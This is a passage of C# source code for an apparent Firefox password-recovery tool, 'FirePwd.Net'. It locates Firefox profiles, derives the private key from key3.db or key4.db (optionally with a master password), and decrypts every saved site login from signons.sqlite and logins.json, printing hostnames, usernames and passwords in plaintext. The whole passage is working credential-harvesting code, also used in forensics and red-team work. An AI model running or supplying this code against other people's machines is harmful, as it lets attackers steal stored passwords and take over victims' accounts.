foreach (DataRow row in dt.Rows)
{
Asn1DerObject user = asn.Parse(Convert.FromBase64String(row["encryptedUsername"].ToString()));
Asn1DerObject pwd = asn.Parse(Convert.FromBase64String(row["encryptedPassword"].ToString()));
if (Verbose)
{
Console.WriteLine("User= "******"Pwd= " + pwd.ToString());
}
string hostname = row["hostname"].ToString();
string decryptedUser = TripleDESHelper.DESCBCDecryptor(privateKey, user.objects[0].objects[1].objects[1].Data, user.objects[0].objects[2].Data);
string decryptedPwd = TripleDESHelper.DESCBCDecryptor(privateKey, pwd.objects[0].objects[1].objects[1].Data, pwd.objects[0].objects[2].Data);
Console.WriteLine(hostname + " " + Regex.Replace(decryptedUser, @"[^\u0020-\u007F]", "") + " " + Regex.Replace(decryptedPwd, @"[^\u0020-\u007F]", ""));
}
return(0);
}
public static int Main(string[] args)
{
string MasterPwd = string.Empty;
byte[] privateKey = new byte[24];
bool loginsFound = false, signonsFound = false;
string signonsFile = string.Empty, loginsFile = string.Empty;;
string filePath = string.Empty;
DBHelper dbh = new DBHelper();
Converts conv = new Converts();
// Read berkeleydb
DataTable dt = new DataTable();
Asn1Der asn = new Asn1Der();
List <LoginFieldS> lp = new List <LoginFieldS>();
List <string> dirs = Directory.GetDirectories(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Mozilla\\Firefox\\Profiles")).ToList();
//Manage args
for (int i = 0; i < args.Length; i++)
{
if (args[i].Equals("-p"))
{
MasterPwd = args[i + 1];
}
if (args[i].Equals("-f"))
{
dirs.Clear();
dirs.Add(args[i + 1]);
}
if (args[i].Equals("-v"))
{
Verbose = true;
}
if (args[i].Equals("-h"))
{
Console.WriteLine("FirePwd.Net v0.1");
Console.WriteLine("Usage :");
Console.WriteLine("\t -p to specify Master Password");
Console.WriteLine("\t -v to activate verbose mode");
Console.WriteLine("\t -f to specify path for files key3.db and signons.sqlite");
return(0);
}
}
foreach (string dir in dirs)
{
// Check if files exists
string[] files = Directory.GetFiles(dir, "signons.sqlite");
if (files.Length > 0)
{
filePath = dir;
signonsFile = files[0];
signonsFound = true;
}
// find logins.json file
files = Directory.GetFiles(dir, "logins.json");
if (files.Length > 0)
{
filePath = dir;
loginsFile = files[0];
loginsFound = true;
}
if (!loginsFound && !signonsFound)
{
Console.WriteLine("File signons & logins not found.");
continue;
}
if (filePath == string.Empty)
{
Console.WriteLine("Mozilla not found.");
continue;
}
if (Verbose)
{
Console.WriteLine("Check if exist key3.db or key3.db");
}
// Check if files exists
if (!File.Exists(Path.Combine(filePath, "key3.db")))
{
privateKey = dbh.CheckKey4DB(dir, MasterPwd, Verbose);
}
else
{
privateKey = dbh.CheckKey3DB(dir, MasterPwd, Verbose);
}
if (privateKey == null || privateKey.Length == 0)
{
Console.WriteLine("Private key return null");
continue;
}
FFLogins ffLoginData;
if (signonsFound)
{
if (Verbose)
{
Console.WriteLine("Fetch users fron signons file");
}
using (SQLiteConnection cnn = new SQLiteConnection("Data Source=" + Path.Combine(filePath, "signons.sqlite")))
{
cnn.Open();
SQLiteCommand mycommand = new SQLiteCommand(cnn);
mycommand.CommandText = "select hostname, encryptedUsername, encryptedPassword, guid, encType from moz_logins;";
SQLiteDataReader reader = mycommand.ExecuteReader();
dt.Load(reader);
}
foreach (DataRow row in dt.Rows)
{
Asn1DerObject user = asn.Parse(Convert.FromBase64String(row["encryptedUsername"].ToString()));
Asn1DerObject pwd = asn.Parse(Convert.FromBase64String(row["encryptedPassword"].ToString()));
string hostname = row["hostname"].ToString();
string decryptedUser = TripleDESHelper.DESCBCDecryptor(privateKey, user.objects[0].objects[1].objects[1].Data, user.objects[0].objects[2].Data);
string decryptedPwd = TripleDESHelper.DESCBCDecryptor(privateKey, pwd.objects[0].objects[1].objects[1].Data, pwd.objects[0].objects[2].Data);
string username = Regex.Replace(decryptedUser, @"[^\u0020-\u007F]", "");
string password = Regex.Replace(decryptedPwd, @"[^\u0020-\u007F]", "");
lp.Add(new LoginFieldS {
url = hostname, userName = username, password = password
});
}
}
if (loginsFound)
{
if (Verbose)
{
Console.WriteLine("Fetch users fron logins file");
}
using (StreamReader sr = new StreamReader(Path.Combine(filePath, "logins.json")))
{
string json = sr.ReadToEnd();
ffLoginData = JsonConvert.DeserializeObject <FFLogins>(json);
}
foreach (LoginData loginData in ffLoginData.logins)
{
Asn1DerObject user = asn.Parse(Convert.FromBase64String(loginData.encryptedUsername));
Asn1DerObject pwd = asn.Parse(Convert.FromBase64String(loginData.encryptedPassword));
string hostname = loginData.hostname;
string decryptedUser = TripleDESHelper.DESCBCDecryptor(privateKey, user.objects[0].objects[1].objects[1].Data, user.objects[0].objects[2].Data);
string decryptedPwd = TripleDESHelper.DESCBCDecryptor(privateKey, pwd.objects[0].objects[1].objects[1].Data, pwd.objects[0].objects[2].Data);
string username = Regex.Replace(decryptedUser, @"[^\u0020-\u007F]", "");
string password = Regex.Replace(decryptedPwd, @"[^\u0020-\u007F]", "");
lp.Add(new LoginFieldS {
url = hostname, userName = username, password = password
});
}
}
}
foreach (var userInfo in lp)
{
Console.WriteLine("===================================================");
Console.WriteLine($"url:{userInfo.url}\nUsername: {userInfo.userName}\nPassword:{userInfo.password}");
Console.WriteLine("===================================================");
}
Console.Read();
return(0);
}
private static String Parse4Logins(string directory, string userName, string masterPassword = "")
{
Asn1Der asn = new Asn1Der();
byte[] item2 = new byte[] { };
byte[] item1 = new byte[] { };
byte[] a11 = new byte[] { };
byte[] a102 = new byte[] { };
string query = "SELECT item1,item2 FROM metadata WHERE id = 'password'";
GetItemsFromQuery(directory, ref item1, ref item2, query);
Console.WriteLine("Fetch data from key4.db file");
Asn1DerObject f800001 = asn.Parse(item2);
MozillaPBE CheckPwd = new MozillaPBE(item1, Encoding.ASCII.GetBytes(""), f800001.objects[0].objects[0].objects[1].objects[0].Data);
CheckPwd.Compute();
string decryptedPwdChk = TripleDESHelper.DESCBCDecryptor(CheckPwd.Key, CheckPwd.IV, f800001.objects[0].objects[1].Data);
if (!decryptedPwdChk.StartsWith("password-check"))
{
Console.WriteLine("Master password is wrong !");
return(null);
}
query = "SELECT a11,a102 FROM nssPrivate";
GetItemsFromQuery(directory, ref a11, ref a102, query);
var decodedA11 = asn.Parse(a11);
var entrySalt = decodedA11.objects[0].objects[0].objects[1].objects[0].Data;
var cipherT = decodedA11.objects[0].objects[1].Data;
byte[] privateKey;
try
{
privateKey = decrypt3DES(item1, masterPassword, entrySalt, cipherT);
}
catch
{
Console.WriteLine("[X] Could not retrieve private key.");
return(null);
}
// decrypt username and password
string loginsJsonPath = String.Format("{0}\\{1}", directory, "logins.json");
Login[] logins = null;
try
{
logins = ParseLoginFile(loginsJsonPath);
}
catch { }
if (logins.Length == 0)
{
Console.WriteLine("No logins discovered from logins.json");
return(null);
}
foreach (Login login in logins)
{
Asn1DerObject user = asn.Parse(Convert.FromBase64String(login.encryptedUsername));
Asn1DerObject pwd = asn.Parse(Convert.FromBase64String(login.encryptedPassword));
string hostname = login.hostname;
string decryptedUser = TripleDESHelper.DESCBCDecryptor(privateKey, user.objects[0].objects[1].objects[1].Data, user.objects[0].objects[2].Data);
string decryptedPwd = TripleDESHelper.DESCBCDecryptor(privateKey, pwd.objects[0].objects[1].objects[1].Data, pwd.objects[0].objects[2].Data);
Console.WriteLine("--- FireFox Credential (User: {0}) ---", userName);
Console.WriteLine("Hostname: {0}", hostname);
Console.WriteLine("Username: {0}", Regex.Replace(decryptedUser, @"[^\u0020-\u007F]", ""));
Console.WriteLine("Password: {0}", Regex.Replace(decryptedPwd, @"[^\u0020-\u007F]", ""));
Console.WriteLine();
}
return(null);
}